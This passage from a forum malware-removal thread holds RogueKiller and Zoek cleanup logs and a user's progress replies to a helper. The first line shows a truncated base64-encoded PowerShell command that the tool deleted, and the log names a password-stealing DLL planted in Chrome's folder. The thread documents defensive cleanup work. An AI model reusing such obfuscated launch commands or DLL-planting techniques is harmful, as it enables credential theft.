AZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7ACAAfQA7AGUAeABpAHQAIAAwADsA) -> Deleted
 
¤¤¤ Files : 4 ¤¤¤
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\add.json -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\add.json -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AGLoader.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AnonymizerGadget.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AnonymizerGadget.zip -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\bearer\qgenericbearer.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\bearer\qnativewifibearer.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\bearer -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\ES.png -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\iconengines\qsvgicon.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\iconengines -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qgif.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qicns.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qico.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qjpeg.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qsvg.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qtga.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qtiff.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qwbmp.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats\qwebp.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\imageformats -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libeay32.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libEGL.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libGLESV2.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\libssl32.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\opengl32sw.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\pepflashplayer.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\platforms\qwindows.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\platforms -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_geoclue.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_positionpoll.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_serialnmea.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position\qtposition_winrt.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\position -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\printsupport\windowsprintersupport.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\printsupport -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\proxycheck.exe -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Core.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Gui.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Network.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Positioning.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5PrintSupport.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Qml.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Quick.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5QuickWidgets.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5SerialPort.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Sql.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Svg.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5WebChannel.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5WebEngineCore.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5WebEngineWidgets.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Widgets.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\Qt5Xml.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\qtwebkit-avc-plugin.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\icudtl.dat -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\qtwebengine_resources.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\qtwebengine_resources_100p.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\qtwebengine_resources_200p.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources\resources.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\resources -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlite.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlmysql.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlodbc.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers\qsqlpsql.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\sqldrivers -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\ssleay32.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\tls.dat -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\ca.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\en-GB.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\en-US.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\fr.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\he.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\ja.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\ru.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\uk.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\zh-CN.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales\zh-TW.pak -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations\qtwebengine_locales -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin\translations -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\US.png -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\CONFIG.JSON -> Deleted
[PUP.Amonetize][File] C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe -> Deleted
[Pwd.Stealer][File] C:\Program Files (x86)\Google\Chrome\Application\winhttp.dll -> Removed at reboot [5]
[PUP.YahooPowered][File] C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\searchplugins\YAHOO! POWERED SEARCH.XML -> Deleted
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
Final Scan (#3)
 
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 11/24/2017 13:53:23 (Duration : 00:15:56)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 0 ¤¤¤
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
 
-----

Zoek Tool
 
 
Zoek.exe v5.0.0.1 Updated 24-October-2017
Tool run by Jpoch on Fri 11/24/2017 at 14:25:14.62.
Microsoft Windows 10 Home 10.0.15063  x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\Jpoch\Downloads\zoek.exe [Scan all users] [Script inserted] 
 
==== System Restore Info ======================
 
11/24/2017 2:25:41 PM Zoek.exe System Restore Point Created Successfully.
 
==== Empty Folders Check ======================
 
C:\PROGRA~2\VMware deleted successfully
C:\PROGRA~2\Zemana AntiMalware deleted successfully
C:\PROGRA~2\COMMON~1\Merge Modules deleted successfully
C:\PROGRA~3\Comms deleted successfully
C:\PROGRA~3\Malwarebytes' Anti-Malware (portable) deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\LocalLow deleted successfully
C:\Users\defaultuser0\AppData\Local\VirtualStore deleted successfully
C:\Users\Jpoch\AppData\Local\Adobe deleted successfully
C:\Users\Jpoch\AppData\Local\DBG deleted successfully
C:\Users\Jpoch\AppData\Local\Notepad++ deleted successfully
C:\Users\Jpoch\AppData\Local\PackageStaging deleted successfully
C:\Users\Jpoch\AppData\Local\TSVNCache deleted successfully
 
==== FireFox Fix ======================
 
Deleted from C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688\prefs.js:
 
Added to C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
 
==== Batch Command(s) Run By Tool======================
 
 
==== Firefox Start and Search pages ======================
 
ProfilePath: C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
 
==== Firefox Extensions ======================
 
AppDir: C:\Program Files (x86)\Mozilla Firefox
- Undetermined - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
 
==== Firefox Plugins ======================
 
 
==== Set IE to Default ======================
 
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
==== All HKLM and HKCU SearchScopes ======================
 
HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKCU\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
 
==== Reset Google Chrome ======================
 
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Preferences.bak was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Secure Preferences was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Secure Preferences.bak was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Web Data was reset successfully
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Web Data-journal was reset successfully
 
==== Empty IE Cache ======================
 
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Jpoch\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Jpoch\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
 
==== Empty FireFox Cache ======================
 
C:\Users\Jpoch\AppData\Local\Mozilla\Firefox\Profiles\lj3u1kkm.default-1511297172688\cache2 emptied successfully
 
==== Empty Chrome Cache ======================
 
C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Cache emptied successfully
 
==== Empty All Flash Cache ======================
 
No Flash Cache Found
 
==== Empty All Java Cache ======================
 
Java Cache cleared successfully
 
==== C:\zoek_backup content ======================
 
C:\zoek_backup (files=0 folders=0 0 bytes)
 
==== Empty Temp Folders ======================
 
C:\WINDOWS\Temp will be emptied at reboot
 
==== After Reboot ======================
 
==== Empty Temp Folders ======================
 
C:\WINDOWS\Temp successfully emptied
C:\Users\Jpoch\AppData\Local\Temp successfully emptied
 
==== Empty Recycle Bin ======================
 
C:\$RECYCLE.BIN successfully emptied
 
==== EOF on Fri 11/24/2017 at 14:29:02.57 ======================
 
 
After the Zoek restart it seems to be running a lot smoother. On the startup, it didn't seem to stress the computer out as much and the apps loaded a lot quicker then they had prior.
 
Sadly firefox and chrome were doing the same thing, but I am onto the reinstall steps you've provided and will updated further.
 
I have to go to work soon, but am hoping to update more before then, but we are seeing a lot of progress, but haven't had to chance to fully play around on the computer to see how its acting.

Edited by Description, 24 November 2017 - 05:33 PM.


#8 nasdaq

nasdaq

  • Malware Response Team
  • 40,238 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:33 AM

Posted 25 November 2017 - 08:37 AM

Start with Chrome. It could be a Sync issue.

#9 Description

Description
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:33 AM

Posted 28 November 2017 - 08:15 AM

Got google reinstalled and you were right about the sync issue. Sorry for the late reponse, real busy with work and forgot a bunch of my PW/acc with the reset XD

 

Seeming to get everything back to normal, and going to do the same with firefox.

I had a hard time finding how to Export my bookmarks with that link, but thankfully it wasn't too hard. You have been super amazing and really appreciate your help






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users